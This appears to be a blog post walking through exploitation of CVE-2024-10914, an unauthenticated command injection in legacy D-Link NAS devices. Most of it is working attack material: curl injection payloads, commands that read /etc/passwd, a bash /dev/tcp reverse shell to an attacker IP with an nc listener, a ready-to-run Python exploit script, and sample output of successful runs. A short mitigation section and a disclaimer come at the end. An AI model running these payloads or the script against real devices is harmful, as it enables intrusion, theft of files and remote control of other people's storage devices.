Understanding and Exploiting CVE-2024-10914: A Critical Vulnerability in D-Link NAS Devices

Introduction

CVE-2024-10914 is a critical command injection vulnerability affecting legacy D-Link NAS devices. This flaw allows unauthenticated attackers to execute arbitrary commands remotely by exploiting improper input validation in the cgi_user_add endpoint.

This blog post provides:

1. Manual exploitation steps to understand the attack.
2. A Python script to automate exploitation.
3. Logs, examples, and mitigation strategies.

Vulnerability Details

• CVE: CVE-2024-10914
• Severity: Critical (CVSS 9.2)
• Type: Command Injection
• Attack Vector: HTTP GET requests targeting cgi_user_add.
• Impacted Devices:
  • DNS-320 (Version 1.00)
  • DNS-320LW (Version 1.01.0914.2012)
  • DNS-325 (Versions 1.01 and 1.02)
  • DNS-340L (Version 1.08)

Root Cause: The vulnerable endpoint fails to sanitize input in the name parameter, allowing attackers to inject malicious shell commands.

Manual Exploitation Method

Step 1: Identify the Target Device

Run an Nmap scan to find devices with exposed web interfaces:

nmap -p 80 --open 192.168.1.0/24

Step 2: Craft a Malicious Payload

The cgi_user_add endpoint is vulnerable to injection. Use curl to send a malicious HTTP GET request:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';uname -a;'"

Step 3: Verify Response

If successful, the target will execute the uname -a command, returning system information.

Example Commands

List Directories:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';ls /;'"

Extract Sensitive Files:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';cat /etc/passwd;'"

Drop Reverse Shell:
Start a listener on your machine:

nc -lvp 4444

Send the payload:

curl "http://<Target-IP>/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';bash -i >& /dev/tcp/<Attacker-IP>/4444 0>&1;'"

Automated Exploitation with Python Script

This Python script simplifies the exploitation process by automating the HTTP request crafting and delivery.

Python Exploit Script

import requests
import sys

def exploit_dlink_nas(target_ip, command):
    url = f"http://{target_ip}/cgi-bin/account_mgr.cgi"
    payload = f"?cmd=cgi_user_add&name=';{command};'"
    full_url = url + payload

    print(f"[+] Sending payload to: {full_url}")
    try:
        response = requests.get(full_url, timeout=10)
        print(f"[+] Response Code: {response.status_code}")
        print("[+] Response Body:")
        print(response.text)
    except Exception as e:
        print(f"[-] Exploitation failed: {e}")

if len(sys.argv) != 3:
    print("Usage: python exploit_dlink.py <target_ip> <command>")
    sys.exit(1)

target_ip = sys.argv[1]
command = sys.argv[2]

exploit_dlink_nas(target_ip, command)

Usage

1. Save the script as exploit_dlink.py.
2. Run the script: python exploit_dlink.py <Target-IP> <Command>

Examples

• Retrieve System Information: python exploit_dlink.py 192.168.1.10 "uname -a" Output: Linux dlink-nas 3.10.23 #1 SMP Wed Dec 5 15:27:08 CST 2018 armv7l GNU/Linux
• List Files: python exploit_dlink.py 192.168.1.10 "ls /"
• Extract /etc/passwd: python exploit_dlink.py 192.168.1.10 "cat /etc/passwd"
• Reverse Shell:
  Start a listener: nc -lvp 4444 Then send the python exploit_dlink.py 192.168.1.10 "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1"

Logs and Analysis

Successful Command Injection (Manual):

curl "http://192.168.1.10/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';ls /;'" 

Response:

bin
boot
etc
home
lib
usr
var

Successful Exploitation (Automated Script):

python exploit_dlink.py 192.168.1.10 "cat /etc/passwd"

Response:

root:x:0:0:root:/root:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin

Mitigation Strategies

1. Retire Vulnerable Devices: Replace legacy D-Link NAS models with actively supported alternatives.
2. Restrict Network Access:
   • Block public internet access to NAS devices.
   • Use firewalls or VLANs to limit access.
3. Monitor Traffic: Analyze HTTP logs for malicious requests targeting cgi_user_add.
4. Disable Unnecessary Features: If possible, disable the vulnerable web interface or restrict its functionality.

Acknowledgments and References

• Original Python Script: GitHub Repository

Additional sources:

1. NVD CVE-2024-10914 Details
2. Cyble Blog on D-Link Vulnerabilities
3. BleepingComputer Coverage

Disclaimer

This blog post is for educational purposes only. Unauthorized exploitation of vulnerabilities is illegal and unethical. Use this information responsibly and only with explicit authorization.

Stay informed, secure your devices, and help make the internet safer! 🌐